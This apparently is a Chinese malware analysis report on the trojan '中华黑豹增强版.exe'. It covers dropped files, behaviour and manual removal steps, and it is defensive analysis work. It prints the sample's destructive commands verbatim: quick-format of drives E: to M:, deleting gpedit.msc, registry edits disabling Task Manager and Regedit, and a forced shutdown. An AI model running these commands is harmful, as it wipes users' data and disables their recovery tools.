样本网址:http://download.csdn.net/detail/cs08211317dn/4144024
一. 大致描述:
1. 样本名称:中华黑豹增强版.exe
2. 家族名: TrojanDownloader:VBS/Lnkget.D(Microsoft)
3. MD5: 58D57C99F8B8836D20BB58B320FDF496
4. 技术细节大致描述: 木马快速格式化除C盘外的硬盘,并在桌面以及除C盘外的硬盘内写入大量特殊名字的空文件夹。这些空文件夹不能直接手动删除。
5. 样本运行后现象:
木马会循环播放一段提示中毒的声音。桌面会变
成如下情况。除了C盘以外的盘被格式化并写入大量空文件夹,桌面上也被创建了大量空文件夹。
等到弹窗倒计时结束后,计算机会自动关闭。
二.技术细节
1. 进程中华黑豹增强版.exe创建文件C:\WINDOWS\system\CHINAHEIBAO\1.vbs,C:\WINDOWS\system\CHINAHEIBAO\3.vbs,C:\WINDOWS\system\CHINAHEIBAO\2.exe,C:\WINDOWS\system\CHINAHEIBAO\8.exe,C:\WINDOWS\system\CHINAHEIBAO\死机.exe,C:\WINDOWS\system\CHINAHEIBAO\提示1.exe,C:\WINDOWS\system\CHINAHEIBAO\提示2.exe,C:\WINDOWS\system\CHINAHEIBAO\3.bat,C:\WINDOWS\system\CHINAHEIBAO\Qingchu.bat,C:\WINDOWS\system\CHINAHEIBAO\ZhuYao.bat。
进程中华黑豹增强版.exe用命令行"C:\WINDOWS\System32\WScript.exe""C:\WINDOWS\system\CHINAHEIBAO\1.VBS"创建新进程C:\WINDOWS\System32\WScript.exe,其中1.VBS的内容如下:
2. 进程c:\windows\system32\cmd.exe用命令cmd /c""C:\WINDOWS\system\CHINAHEIBAO\ZhuYao.bat" /start"调用批处理文件ZhuYao.bat。用记事本打开这个文件发现全是乱码。
用如下attrib命令ATTRIB\WINDOWS\system\CHINAHEIBAO +S +R +H,设置WINDOWS\system\CHINAHEIBAO文件夹属性为系统、只读和隐藏。
用regedit命令regedit.exe /s 1.reg将1.reg中的内容写入注册表,以禁用任务管理器,1.reg内容如下:
进程c:\windows\system32\cmd.exe连续用命令行format e:/q /y,format f:/q /y,format g:/q /y,format h:/q /y,format i:/q /y,format j:/q /y,format k:/q /y format L:/q /y,format M:/q /y,快速格式化E盘,F盘,G盘等。
进程c:\windows\system32\cmd.exe删除文件C:\WINDOWS\system32\gpedit.msc,此文件为组策略管理器。
进程c:\windows\system32\cmd.exe用命令行attrib "C:\Documents and Settings\Administrator\「开始」菜单\程序\启动" +h +s +r,修改文件夹C:\Documents and Settings\Administrator\「开始」菜单\程序\启动的属性为系统、只读和隐藏。
进程c:\windows\system32\cmd.exe创建文件C:\Documents and Settings\Administrator\「开始」菜单\程序\启动\Qingchu.bat。
进程c:\windows\system32\cmd.exe用命令行reg add"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellIcons" /v 3 /d "\WINDOWS\system\"CHINAHEIBAO\1.ico",0"/f,以修改文件夹图标为WINDOWS\system\"CHINAHEIBAO\1.ico。
进程c:\windows\system32\cmd.exe创建进程c:\windows\system\chinaheibao\2.exe和c:\windows\system\chinaheibao\8.exe。
进程c:\windows\system32\cmd.exe用命令行"C:\WINDOWS\System32\WScript.exe""C:\WINDOWS\system\CHINAHEIBAO\3.vbs"。文件3.vbs内容截图如下:
进程c:\windows\system32\cmd.exe创建新进程c:\windows\system\chinaheibao\提示1.exe和c:\windows\system\chinaheibao\提示2.exe,以显示如下两个窗口:
进程c:\windows\system32\cmd.exe连续循环调用以下5条命令行:reg add "hkcu\control panel\desktop"/v "wallpaper" /d "\WINDOWS\system\CHINAHEIBAO\1.BMP" /f,reg add "hkcu\control panel\desktop" /v"wallpaper" /d "\WINDOWS\system\CHINAHEIBAO\2.BMP" /f,reg add "hkcu\control panel\desktop" /v"wallpaper" /d "\WINDOWS\system\CHINAHEIBAO\3.BMP" /f,reg add "hkcu\control panel\desktop" /v"wallpaper" /d "\WINDOWS\system\CHINAHEIBAO\4.BMP" /f,reg add "hkcu\control panel\desktop" /v"wallpaper" /d "\WINDOWS\system\CHINAHEIBAO\5.BMP" /f,以使得桌面在1.bmp到5.bmp这5张图片之间切换。
进程c:\windows\system32\cmd.exe用命令行shutdown.exe -s -t 300 -c "非常抱歉!系统检测到了 中华黑豹 病毒,Windows正在后台紧急处理,请稍等,不要关闭计算机,系统将自动关闭",使得弹出如下对话框:
并且系统在倒计时结束之后自动关闭。
进程c:\windows\system32\reg.exe修改注册表项HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools的值为0x00000001(1),以禁用注册表编辑器。
进程c:\windows\system32\cmd.exe创建新进程c:\windows\system\chinaheibao\死机.exe。
进程: c:\windows\system32\cmd.exe用命令行mshta "javascript:newActiveXObject('WMPlayer.OCX').cdromCollection.Item(0).Eject();window.close();"创建进程mshta.exe。
3.木马会在桌面以及除了C盘以外的硬盘里生成大量命名特殊的空文件夹,截图如下:
试图直接删除这些文件夹,删除时报错:
用xuetr删除失败,用xuetr强制删除成功。也可以先用xuetr重命名文件,去除文件末尾的“.”,然后再直接删除文件。
无法直接删除这些文件夹的原因是XXXXXXXXXXXXXX.这样的文件名不符合8.3的命名规制,WINDOWS下允许建立不符合8.3命名规则的文件,但是在删除时会找不到文件。
三. 手杀方案
1. 中病毒之后重启计算机
2. 手动删除C:\WINDOWS\system\CHINAHEIBAO文件夹(此时里面的文件已经都自动删除了)。
3. 删除注册表项HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskmgr和HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools,以使任务管理器和注册表编辑器可用。
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellIcons
4. 用xuetr强制删除桌面以及除了C盘以外硬盘中的空文件夹。或者先用xuetr重命名文件夹,去掉文件名最后的“.”,然后直接手动删除文件。
枚举进程)
